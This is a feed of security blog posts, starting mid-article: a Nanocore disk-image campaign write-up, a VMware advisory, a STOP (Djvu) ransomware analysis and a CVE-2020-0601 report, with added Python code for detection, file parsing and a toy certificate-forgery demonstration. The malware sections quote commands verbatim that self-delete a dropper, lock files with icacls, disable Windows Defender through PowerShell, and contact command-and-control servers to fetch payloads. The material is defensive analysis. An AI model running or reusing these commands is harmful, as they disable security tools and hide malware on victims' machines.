 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Figure 7: RegAsm reaching out to command and control servers

 

Finally, the malware spawns cmd.exe to delete the original binary. The built-in choice command is used as a timer: /T 3 with a default answer of Y waits three seconds, giving the dropper time to exit before Del removes it from the mounted image:

Process Information:

 New Process ID:  0x2900

 New Process Name: C:\Windows\SysWOW64\cmd.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

 

Figure 8: Evidence of deleting the original dropper.

 

At this point in the investigation of the original dropper and the subsequent suspicious files, we still could not answer how the malware ended up on this user’s computer in the first place. However with the filename of the original dropper to pivot with, a quick web search for the filename turned up a thread on Symantec.com from a user asking for assistance with the file in question. In this post, they write that they recognize the filename from a malspam email they received. Based on the Symantec thread and other clues, such as the use of the shipping service DHL in the filename, we now know the delivery method is likely via email.

Delivery Method Techniques

We used the following Splunk query to search our Email Security Appliance logs for the beginning of the filename we found executing RegAsm.exe in the Windows Event Logs.

index=esa earliest=-30d
    [search index=esa "DHL*.img" earliest=-30d
    | where isnotnull(cscoMID)
    | fields + cscoMID,host
    | format]
| transaction cscoMID,host
| eval wasdelivered=if(like(_raw, "%queued for delivery%"), "yes", "no")
| table esaTo, esaFrom, wasdelivered, esaSubject, esaAttachment, Size, cscoMID, esaICID, esaDCID, host

Figure 9: Splunk query looking for original DHL files.

As expected, the emails all came from the spoofed sender address noreply@dhl.com with some variation of the subject "Re: DHL Notification / DHL_AWB_0011179303/ ETD". In total, CSIRT identified 459 emails from this campaign sent to our users; 396 of them were delivered, carrying 18 different Nanocore samples.

396 malicious emails making it past our well-tuned and automated email mitigation tools is no easy feat. While the lure the attacker used to social engineer their victims was common and unsophisticated, the technique they employed to evade defenses was successful – for a time.

Detecting the Techniques

During the lessons learned phase after this campaign, CSIRT developed numerous incident response detection rules to alert on newly observed techniques discovered while analyzing this incident. The first and most obvious being, detecting malicious disk image files successfully delivered to a user’s inbox. The false-positive rate for this specific type of attack is low in our environment, with a few exceptions here and there – easily tuned out based on the sender. This play could be tuned to look only for disk image files with a small file size if they are more prevalent in your environment.

Another valuable detection rule we developed after this incident monitors for suspicious usage (network connections) of the Assembly Registration tool, RegAsm.exe, on our endpoints, since that is the process Nanocore injected itself into and used for C2 communication. It is also very unlikely to see legitimate use of the choice command to build a self-deleting binary, so monitoring for execution of choice with the command-line arguments seen in the Windows event above should be a high-fidelity alert.
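The process-tree observations above (execution from \Device\CdRom0\, RegAsm.exe with an unexpected parent, and the choice-then-Del self-delete) as detection logic run over sample Security event log excerpts. This is an added example, not CSIRT's actual rules: the three malicious events reproduce the process names from the post, while the benign installer event, the list of trusted parent directories and the double-extension pattern are assumptions made for the example. It parses the "Process Information" blocks as they appear in the post, applies the three rules and walks the Creator Process ID links to reconstruct the chain.

```python
"""Process-creation (event 4688) triage for the disk-image / RegAsm / choice-del
chain described in the post. Added example, not CSIRT's detection rules."""
import re

# Constructed sample: the first three events mirror the post's excerpts, the
# fourth is an invented benign installer calling RegAsm.exe.
SAMPLE_EVENTS = r"""
Process Information:
 New Process ID:  0x2ba0
 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Creator Process ID: 0x28e8
 Creator Process Name: C:\Windows\explorer.exe
 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Process Information:
 New Process ID:  0x4128
 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Process Information:
 New Process ID:  0x2900
 New Process Name: C:\Windows\SysWOW64\cmd.exe
 Creator Process ID: 0x2ba0
 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe
 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Process Information:
 New Process ID:  0x1000
 New Process Name: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
 Creator Process ID: 0x0fff
 Creator Process Name: C:\Program Files\VendorApp\setup.exe
 Process Command Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /codebase VendorApp.dll
"""

FIELD = re.compile(r"^\s*([A-Za-z ]+?):\s+(.*?)\s*$")
# Files launched from a mounted image show the NT device path, not a drive letter.
MOUNTED_IMAGE = re.compile(r"^\\Device\\CdRom\d+\\", re.I)
# "Looks like a document, is an executable": _PDF.exe, .doc.scr ... (assumed pattern).
DOUBLE_EXT = re.compile(r"[._ -](pdf|docx?|xlsx?|jpe?g|png|txt)[^\\]*\.(exe|scr|com|bat|js|vbs)$", re.I)
PROXY_BINARIES = {"regasm.exe", "regsvcs.exe"}
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# choice used as a timer (/T n with a default answer) followed by del of a file.
DELAYED_SELF_DELETE = re.compile(r"\bchoice\b[^&]*/T\s+\d+[^&]*&\s*del\b", re.I)


def parse_events(text):
    """Turn 'Process Information:' blocks into dicts keyed by field name."""
    events = []
    for chunk in re.split(r"^Process Information:\s*$", text, flags=re.M):
        fields = {}
        for line in chunk.splitlines():
            m = FIELD.match(line)
            if m:
                fields[m.group(1).strip()] = m.group(2)
        if "New Process Name" in fields:
            events.append(fields)
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1]


def triage(events):
    """Return (new_pid, rule, detail) tuples for events matching the post's TTPs."""
    findings = []
    for ev in events:
        new = ev.get("New Process Name", "")
        parent = ev.get("Creator Process Name", "")
        cmd = ev.get("Process Command Line", "")
        pid = ev.get("New Process ID", "?")
        if MOUNTED_IMAGE.match(new) and DOUBLE_EXT.search(basename(new)):
            findings.append((pid, "exec-from-mounted-image", basename(new)))
        if basename(new).lower() in PROXY_BINARIES and not parent.lower().startswith(TRUSTED_PARENT_DIRS):
            findings.append((pid, "regasm-proxy-execution", parent))
        if basename(new).lower() == "cmd.exe" and DELAYED_SELF_DELETE.search(cmd):
            findings.append((pid, "choice-delayed-self-delete", cmd))
    return findings


def process_chain(events, pid):
    """Follow Creator Process ID links back to the earliest recorded ancestor."""
    by_pid = {ev["New Process ID"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        ev = by_pid[pid]
        chain.append(basename(ev["New Process Name"]))
        pid = ev.get("Creator Process ID")
    return chain


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for finding in triage(evs):
        print(finding)
    print(" <- ".join(process_chain(evs, "0x2900")))
```

Event 4688 alone does not show the RegAsm.exe network connections the post's rule keys on; pair the proxy-execution finding with firewall (5156) or Sysmon network-connect events for that PID to reach the fidelity described above.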

Some additional, universal takeaways from this incident:

  1. Auto-mitigation tools should not be treated as a silver bullet – Effective security monitoring, rapid incident response, and defense in depth/layers is more important.
  2. Obvious solutions such as blocking extensions at email gateway are not always realistic in large, multifunction enterprises – .IMG files were legitimately being used by support engineers and could not be blocked.
  3. Malware campaigns can slip right past defenders on occasion, so a wide playbook that focuses on how attackers operate and infiltrate (TTPs) is key for finding new and unknown malware campaigns in large enterprises (as opposed to relying exclusively on indicators of compromise.)

 

Indicators Of Compromise (IOCS)

2b6f19fac64c847258fe776a2ea6444cc469ac6a348e714fcab23cc6cb2c5b74

327c646431a644192aae8a0d0ebe75f7a2b98d7afa7a446afa97e2a004ca64b0

3718957d7f0da489935ce35b6587a6c93f25cff69d233381131b757778826da3

3873ef89a74a9c03ba363727b20429a45f29a525532d0ef9027fce2221f64f60

3a7c23a01a06c257b2f5b59647461ebf8f58209a598390c2910d20a9c5757c62

4eb2af63e121c22df7945258991168be4a70aa32669db173743701aab94383fb

5d14e5959c05589978680e46bffd586e10c1fcabc21ddd94c713520cd0037640

6a2af44e186531d07c53122d42280bc18929d059b98f0449c1a646d66a778ffb

80ab695da86e97861b294b72ba1ef2e8e2f322e7ec0d0834e71f92497515b63d

a34aa05710cf0afb111181c23468c2dcc3a2c2d6aa496c9dffe45dde11e2c4d1

abf41ea1909a39c644e5b480b176ef8a3c4a80e2ee8b447d4320e777384392cf

af5d9ca1ed166a8d378c5b5ed7e187035f374b4376bdd632c3a2ee156613fd29

afb87da69c9ad418ac29af27602a450a7eae63132443c7bc56ab17785dd3bbfd

d871704baad496b47b15da54e7766c0a468ac66337d99032908ad7d4732ecffb

da79495b8b75c9b122a1116494f68661ec45a1fdfb8fd39c000f1f691b39bc13

deb805ce329f17a48165328879b854674eb34abd704eeb575e643574f31d3e83

eaee0577806861c23bef8737e5ba2d315e9c6bfa38bf409dda9a2a13599615b4

fc0cf381e433cd578128be91dfd7567d2294a6d3ff4d2ce0e3f4046442b1f5f0

185.101.94.172:8166

The post Disk Image Deception appeared first on Cisco Blogs.

VMware addresses flaws in VMware Tools and Workspace ONE SDK

VMware has released security updates to address a local privilege escalation vulnerability in VMware Tools version 10 for Windows.

VMware has released VMware Tools 11.0.0, which addresses a local privilege escalation issue in Tools 10.x.y tracked as CVE-2020-3941. The issue is a race condition that a malicious actor with access to the guest virtual machine could exploit to escalate privileges inside the guest.

“A malicious actor on the guest VM might exploit the race condition and escalate their privileges on a Windows VM. This issue affects VMware Tools for Windows version 10.x.y as the affected functionality is not present in VMware Tools 11.” reads the advisory published by the company.

The vulnerability has been assigned an important severity rating and a CVSS score of 7.8. The company also suggests a workaround in case users cannot upgrade their version.

“However, if upgrading is not possible, exploitation of this issue can be prevented by correcting the ACLs on C:\ProgramData\VMware\VMware CAF directory in the Windows guests running VMware Tools 10.x.y versions. In order to correct ACLs for this directory, remove all write access permissions for Standard User from the directory,” reads Workaround for VMware Tools for Windows security vulnerability (CVE-2020-3941) (76654).

Recently the virtualization giant also disclosed an information disclosure issue, tracked as CVE-2020-3940, that affects Workspace ONE SDK and dependent iOS and Android mobile applications.

Vulnerable applications do not properly handle certificate verification failures if SSL pinning is enabled in the UEM Console.

“A sensitive information disclosure vulnerability in the VMware Workspace ONE SDK was privately reported to VMware.” states the security advisory.

“A malicious actor with man-in-the-middle (MITM) network positioning between an affected mobile application and Workspace ONE UEM Device Services may be able to capture sensitive data in transit if SSL Pinning is enabled.” 

The vulnerability has been assigned an important severity rating and a CVSS score of 6.8.

The list of vulnerable applications and SDKs include Workspace ONE Boxer, Content, Intelligent Hub, Notebook, People, PIV-D, Web, and the SDK plugins for Apache Cordova and Xamarin.

Pierluigi Paganini

(SecurityAffairs – VM, hacking)

The post VMware addresses flaws in VMware Tools and Workspace ONE SDK appeared first on Security Affairs.

STOP (Djvu) Ransomware: Ransom For Your Shady Habits!


With almost 200 extensions, STOP (Djvu) can be called 2019's most active and widespread ransomware. Although it had been active for a year before, it began its campaign in earnest in early 2019. To evade detection, it has continuously changed its extensions and payloads. For earlier infections, data recovery was easier if the key had not been generated online by the CnC: early payloads used symmetric encryption and, for offline systems, the same set of keys, so once a payload was obtained, decryption was straightforward. From mid-2019 the encryption strategy changed, which made decrypting infected files difficult. Given the continuous improvement in infection vectors and payloads, the STOP actors can be considered among the most active malware authors of 2019.

Here we discuss its behavior and updated file encryption technique in detail, along with its parallel activity of downloading other malware and what that malware does. The statistics section shows its prominence over the last few months.

Infection Vectors:

According to our telemetry, this ransomware spreads through cracked applications, keygens, activators, fake application installers and fake Windows updates. Looking at the infection vectors and the ransom demanded, these actors favored volume over carefully chosen high-value targets, unlike Ryuk. We have observed cracked files or fake activators for software such as Tally, AutoCAD, Adobe Photoshop, Internet Download Manager, Microsoft Office, the Opera browser, VMware Workstation and Quick Heal Total Security spreading this ransomware.

Payload Behaviour:

Fig. 1: ProcessMap

The main STOP (Djvu) payload carries many anti-emulation and anti-debugging techniques, implemented by a common wrapper that is believed to be used for most of its payloads. Some ransomware families avoid encrypting systems in particular countries, depending on their region of origin and on how likely victims there are to pay, and commonly identify the victim's country from the keyboard layout. STOP's authors did not rely on that legacy technique, which leaves room for error. Instead the payload geolocates the system by requesting "https[:]//api.2ip.ua/geo.json", whose response contains the system's location and timezone.

In response to this request, details of location including longitude, latitude, timezone along with country and city are received.

Fig. 2: IP Response

The retrieved country code is compared with a few other country codes. If it matches with any of the listed country codes, the payload does not execute further. The image below shows the country code comparison before encryption.

Fig. 3: Country Code Comparison

Once it confirms that the victim is not in one of the listed countries, it creates a folder named with a UUID/GUID under "%AppData%\Local\", copies itself there, and restricts access to that copy with icacls, denying Everyone (SID S-1-1-0) delete rights so the file is not easily removed:

icacls "%AppData%\Local\{UuId}" /deny *S-1-1-0:(OI)(CI)(DE,DC)

where OI: Object Inherit, CI: Container Inherit, DE: Delete, DC: Delete Child.

After this, the payload relaunches itself from its original location with elevated (administrator) rights:

<Directory Path>\ewrewexcf.exe --Admin IsNotAutoStart IsNotTask

and then terminates the parent process. The parameters tell the new instance that it was started neither by an autostart entry nor by a scheduled task, and that it is running as admin. This new process then creates a scheduled task through the Task Scheduler COM interface at:

C:\Windows\System32\Tasks\Time Trigger Task

Fig. 4: Time Trigger Task

Then it retrieves the MAC address of the system using GetAdaptersInfo(). An MD5 hash of this MAC address is then calculated using Windows Crypto APIs and is then used to uniquely identify the system. A request is sent to malicious CnC using this MD5 hash, which gets RSA-2048 public key and system encryption identifier i.e. personal ID as a response.

Request format:

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

This response is stored in %AppData%\Local\bowsakkdestx.txt. This key is further used in file encryption, which we will discuss later. Also, the ID received along with the public key is stored in C:\SystemID\PersonalID.txt for future reference.

While receiving personal ID and public key, the ransomware payload also downloads a couple of other malware from the CnC server. It consists of infamous info-stealer i.e. Vidar and a trojan payload which is similar to previously seen Vilsel.

Fig. 5: File Download Requests

In Fig.5, ‘5.exe’ was downloaded and it is one of the Vidar payloads, while ‘updatewin1.exe’ was Vilsel. The lateral activity of these components will be discussed later.

For persistence, along with time trigger task, it also creates one RUN registry entry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "SysHelper" = "%AppData%\Local\{UuId}\34efcdsax.exe" --AutoStart

It drops the ransom note into every directory it enumerates. Before starting encryption, it creates the mutex {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, which is common across the STOP-Djvu campaign.

It particularly checks for the presence of file I:\5d2860c89d774.jpg and if present, it encrypts this file.

File Encryption:

File encryption involves 2 types:

  • Encryption with Online Key
  • Encryption with Offline Key

In the first case, the payload tries to contact the CnC, requesting a server-generated public key and ID using the MD5 hash of the system's MAC address. The response is saved in bowsakkdestx.txt and this key is used for the encryption that follows.

In the second case, when STOP cannot get a response from the CnC, it checks for bowsakkdestx.txt in the '%AppData%/Local' directory. If the file exists, it looks for the 'Public Key' keyword in it; if the key is missing, the payload deletes the file and retries the CnC. If the file is absent, it falls back to the public key and ID embedded in the payload itself (the offline key). Most strings in the payload are stored encrypted, XORed with the byte key 0x80. Recent STOP payloads carry an offline ID built from the extension name followed by "t1".

ex: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

Few file types and directories are skipped from the encryption process based on path and file extensions.

Extensions excluded:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Along with above extensions, the extension used by payload to indicate encryption is also avoided.

Files Excluded:

ntuser.dat  ntuser.dat.LOG1  ntuser.dat.LOG2  ntuser.pol  _readme.txt

Folders in Windows directory and browser folders in the Program Files directory are excluded from encryption.

Before encrypting a file, it also checks for the encryption marker "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" at the end of the file (where it follows the personal ID in already-encrypted files), so that files are not encrypted twice.

While encrypting a file, it leaves the first 5 bytes untouched and encrypts the rest of the file data with Salsa20. A fresh UUID is generated for each file and used as its Salsa20 key, so every file is encrypted under a unique key. An example of one Salsa20 key is shown below.

Fig. 6: Salsa20 Key

After encryption of file data, the UUID used as Salsa20 key is also encrypted with the RSA-2048 public key which was received from the CnC server. In the case of offline encryption, this key is retrieved from the payload itself. The encrypted UUID is appended after encrypted file data. The personal ID which was again received from the server with RSA-2048 public key is appended to encrypted UUID. If files are encrypted offline, then this personal ID is also retrieved from file and is common for all offline infected victims. At the end of the file, encryption marker ‘{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}’ is written.

Fig. 7: File Encryption Structure
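The targeting rules and the encrypted-file layout described above, as an added example (this is not Seqrite's code). The byte layout follows the post: a 5-byte cleartext prefix, the Salsa20 ciphertext, the RSA-2048-wrapped per-file key (256 bytes, the size of an RSA-2048 ciphertext), the personal ID, then the marker GUID. The personal ID length is an assumption taken from the length of the post's example ID, the sample file is constructed, and its "ciphertext" and wrapped key are placeholder bytes rather than real Salsa20 or RSA output; the code reproduces the exclusion checks the payload makes and a parser an analyst can run over encrypted files to pull out the ID, the offline/online distinction and the wrapped key.

```python
"""STOP (Djvu) targeting rules and encrypted-file trailer parser.

Added example, not Seqrite's code. Layout per the post:
[5 clear bytes][Salsa20 ciphertext][RSA-2048-wrapped key][personal ID][marker].
"""

MARKER = b"{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}"
CLEAR_PREFIX_LEN = 5
WRAPPED_KEY_LEN = 256                      # RSA-2048 ciphertext size
EXAMPLE_ID = b"Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1"   # the post's example offline ID
DEFAULT_ID_LEN = len(EXAMPLE_ID)           # assumption: IDs are this long
SKIP_EXT = {".sys", ".ini", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms"}
SKIP_NAMES = {"ntuser.dat", "ntuser.dat.log1", "ntuser.dat.log2", "ntuser.pol", "_readme.txt"}


def _name_and_ext(path):
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    ext = "." + name.rsplit(".", 1)[1] if "." in name else ""
    return name, ext


def stop_would_skip(path, data, enc_ext):
    """True if the payload's exclusion rules (as described in the post) leave
    this file alone: excluded names/extensions, its own extension, anything
    under the Windows directory, or a file already carrying the marker.
    (The post also mentions browser folders under Program Files; not modelled.)"""
    name, ext = _name_and_ext(path)
    if name in SKIP_NAMES or ext in SKIP_EXT or ext == enc_ext.lower():
        return True
    if path.replace("/", "\\").lower().startswith("c:\\windows\\"):
        return True
    return data.endswith(MARKER)          # encryption-marker check before encrypting


def parse_encrypted(data, id_len=DEFAULT_ID_LEN):
    """Split an encrypted file into its components; None if it is not
    STOP-marked or too short. Offline infections share an ID ending in 't1'."""
    if not data.endswith(MARKER):
        return None
    body = data[:-len(MARKER)]
    if len(body) < CLEAR_PREFIX_LEN + WRAPPED_KEY_LEN + id_len:
        return None
    personal_id = body[-id_len:]
    wrapped_key = body[-(id_len + WRAPPED_KEY_LEN):-id_len]
    try:
        pid = personal_id.decode("ascii")
    except UnicodeDecodeError:
        return None
    return {
        "clear_prefix": body[:CLEAR_PREFIX_LEN],
        "ciphertext": body[CLEAR_PREFIX_LEN:-(id_len + WRAPPED_KEY_LEN)],
        "wrapped_key": wrapped_key,
        "personal_id": pid,
        "offline_key": pid.endswith("t1"),
    }


def build_sample(personal_id=EXAMPLE_ID):
    """Construct a file in the described layout (constructed test data: the
    ciphertext and wrapped key are stand-in bytes, not real Salsa20/RSA output)."""
    clear_prefix = b"%PDF-"
    ciphertext = bytes(range(256)) * 2               # stand-in for Salsa20 output
    wrapped_key = b"\xaa" * WRAPPED_KEY_LEN          # stand-in for the RSA-2048 blob
    return clear_prefix + ciphertext + wrapped_key + personal_id + MARKER


if __name__ == "__main__":
    sample = build_sample()
    info = parse_encrypted(sample)
    print(info["personal_id"], "offline" if info["offline_key"] else "online")
    print(stop_would_skip(r"C:\Users\victim\Documents\report.docx", sample, ".djvu"))
```

An ID ending in "t1" tells the analyst the file was encrypted with the embedded offline key, which is the case where a known key for that variant can decrypt it; an online ID means the 256-byte wrapped key can only be unwrapped with the CnC's private RSA key.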

 

Lateral Activity:

     1. Vidar (5.exe)

Vidar is a known info-stealer trojan, which collects sensitive information from your system and then delivers it to its CnC. The information it may steal includes:

  • Browser Login Data, History, Cookies
  • Browser Cache
  • System Information
  • Messaging/Email software data
  • Two-factor authentication software data

It checks for the presence of various browsers and software including two-factor authentication tools.

Fig. 8: Vidar File Access

It stores stolen data in a randomly named folder in the ProgramData directory. In this directory, few ‘.zip’ files are created which contain files like information.txt which has details of user and machine, running processes and software installed in the system. The retrieved passwords/credentials from browsers and other software are stored in passwords.txt. The rest of the information is stored in directories/files with respective software names.

Fig. 9: Vidar File Write

There is one additional file named ID, containing an SQL database with tables such as logins, meta, stats, sync_entities_metadata and sync_model_metadata; these hold mainly the user's browser data. All of this data is then sent to Vidar's CnC, hxxp://crarepo[.]com/ in this case; the CnC servers have been observed changing over time.

Fig. 10: Vidar HttpSendRequestA

     2. Updatewin1.exe:

This component is mainly used to hide ransomware’s existence or evade detection based on the behavior of malware. It shows similarity with the Vilsel Trojan family.

First, it re-executes itself with elevated privileges. The elevated process runs PowerShell with the following command line to change the execution policy from the default Restricted to RemoteSigned, which allows locally created scripts to run without a digital signature:

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

updatewin1.exe then drops script.ps1, containing the command 'Set-MpPreference -DisableRealtimeMonitoring $true', at the %temp% location and starts a new PowerShell instance with the parameters:

-NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File %AppData%\Local\script.ps1' -Verb RunAs}"

This launches PowerShell with admin privileges (Start-Process -Verb RunAs) and bypasses the execution policy for that instance, so script.ps1 runs and disables Windows Defender real-time protection. It also removes Windows Defender's downloaded definitions with the command:

mpcmdrun.exe -removedefinitions -all

The task manager is also disabled by changing the registry and then updatewin1.exe deletes itself using a batch file.

     3. Updatewin.exe:

This component has no suspicious or malicious activity. It just displays windows update prompt so that any of the suspicious activities will be considered as windows update changes. There is no minimize or close option to this window, one has to kill the process to get rid of it.

Fig. 12: Fake Update Window

 

Ransom note:

Fig. 13: _readme.txt Ransom note

Over the campaign, the STOP ransom note has remained the same with few small changes. It asks for $980 of ransom and gives a 50% discount if payment is done within 3 days. The conversation with victims is carried over the mail. Ransom note contains the Personal Id of the user which is also stored in C:\SystemID\PersonalID.txt.

Statistics:

Fig. 14: Statistics

From the introduction of the new RSA 2048 variant, we have seen a noticeable increase in infections. As the chart above states, there was a gradual increase from August till November with hits crossing 120,000 mark. However, there’s been a decrease in hits in December, which seems to have continued in the month of January.

Conclusion:

From the start of the STOP-djvu campaign, stop authors have focused on changing payloads and extensions within short intervals, making their presence among ransomware strong and sound. Initially, authors believed in symmetric cryptography, hoping for ransom from most of the cases with newer payloads and unique keys for each variant. The free decryptors for offline infections forced them to shift to asymmetric cryptography, which made the decryption of new infections harder. Also, propagating through multiple crack software, activators, keygen software and fake software/OS upgrades, has been an effective way of spreading for this ransomware.

IOCs:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

 URLs:

hxxp://ring2[.]ug/files/penelop/3.exe

hxxp://ring2[.]ug/files/penelop/4.exe

hxxp://ring2[.]ug/files/penelop/5.exe

hxxp://ring2[.]ug/files/penelop/updatewin.exe

hxxp://ring2[.]ug/files/penelop/updatewin1.exe

hxxp://ring2[.]ug/files/penelop/updatewin2.exe

hxxp://crarepo[.]com/

The post STOP (Djvu) Ransomware: Ransom For Your Shady Habits! appeared first on Seqrite Blog.

Microsoft addresses CVE-2020-0601 flaw, the first issue ever reported by NSA

Microsoft has released a security update to address “a broad cryptographic vulnerability” that is impacting its Windows operating system.

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 vulnerability is different from any other previously addressed flaws because it was reported by the NSA and this is the first time that the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ and tracked as CVE-2020-0601, resides in the Crypt32.dll module that contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.  

The flaw affects the way Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to mount man-in-the-middle attacks, presenting a spoofed certificate for a TLS connection, and so intercept and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software tricking the system into believing that it is a legitimate application.

Microsoft addressed the issue by ensuring that Windows CryptoAPI completely validates ECC certificates.
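The post does not describe the mechanism. The publicly documented root cause (from the NSA and Microsoft advisories) is that CryptoAPI accepted ECC certificates carrying explicit curve parameters and matched them against a trusted root by public key alone, without checking that those parameters, in particular the generator point, were the standard ones for the named curve. The following added example (not from the post) shows on a toy curve why that check matters: an attacker who knows only the trusted public key Q can pick their own private key d2 and solve for a generator G2 with d2*G2 = Q, so a certificate claiming Q under parameters (p, a, b, G2) is one the attacker can sign for. The curve y^2 = x^3 + 497x + 1768 over F_9739 is an assumed toy curve chosen so every quantity can be brute-forced; signature generation itself is omitted, since the point is that the attacker holds a private key consistent with the trusted public key under the forged parameters.

```python
"""Toy demonstration of the certificate-validation flaw class behind
CVE-2020-0601. Added example, not from the post; the curve is a small
assumed one, not a real standard curve."""
import math

P, A, B = 9739, 497, 1768      # y^2 = x^3 + A x + B over F_P (toy parameters)


def on_curve(pt):
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine group law; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def point_order(pt):
    """Brute-force order of pt (feasible only because the curve is tiny)."""
    n, cur = 1, pt
    while cur is not None:
        cur, n = ec_add(cur, pt), n + 1
    return n


def standard_generator():
    """First point found on the curve (P = 3 mod 4, so sqrt is a single pow)."""
    for x in range(1, P):
        rhs = (x ** 3 + A * x + B) % P
        y = pow(rhs, (P + 1) // 4, P)
        if y and (y * y) % P == rhs:
            return (x, y)
    raise RuntimeError("no point found")


def forge_generator(victim_pub, order):
    """Attacker picks any private key d2 coprime to the order and solves for a
    generator G2 = d2^-1 * Q, so that d2*G2 == Q without ever knowing d."""
    d2 = 2
    while math.gcd(d2, order) != 1:
        d2 += 1
    return d2, ec_mul(pow(d2, -1, order), victim_pub)


def trusted_by_key_only(cert, roots):
    """Vulnerable pattern: identity is the public key, parameters unchecked."""
    return any(cert["pub"] == r["pub"] for r in roots)


def trusted_with_params(cert, roots):
    """Fixed pattern: the curve parameters must match the root's as well."""
    return any(cert["pub"] == r["pub"] and cert["params"] == r["params"] for r in roots)


def demo():
    g = standard_generator()
    n = point_order(g)
    d = 1234 % n or 1                      # victim's (toy) private key
    q = ec_mul(d, g)                       # victim's public key, as in a trusted root
    root = {"pub": q, "params": (P, A, B, g)}
    d2, g2 = forge_generator(q, n)
    forged = {"pub": q, "params": (P, A, B, g2)}   # same key, attacker's generator
    return {
        "attacker_controls_key": ec_mul(d2, g2) == q and d2 != d,
        "vulnerable_accepts": trusted_by_key_only(forged, [root]),
        "fixed_accepts": trusted_with_params(forged, [root]),
    }


if __name__ == "__main__":
    print(demo())
```

The practical check is the fixed one: a certificate that specifies explicit parameters must have those parameters compared against the named curve's (or be rejected outright in favour of named-curve OIDs), not just its public key matched against a cache of trusted keys.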

Microsoft did not release technical details of the vulnerability to avoid its public exploitation.

Microsoft confirmed that it is not aware of attacks in the wild exploiting the CVE-2020-0601 flaw.

“This month we addressed the vulnerability CVE-2020-0601 in the usermode cryptographic library, CRYPT32.DLL, that affects Windows 10 systems. This vulnerability is classed Important and we have not seen it used in active attacks.” reads a blog post published by Microsoft.

“This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk.”

The NSA has also released a security advisory that includes mitigation information.

“NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows®1 cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.” reads the NSA’s advisory.

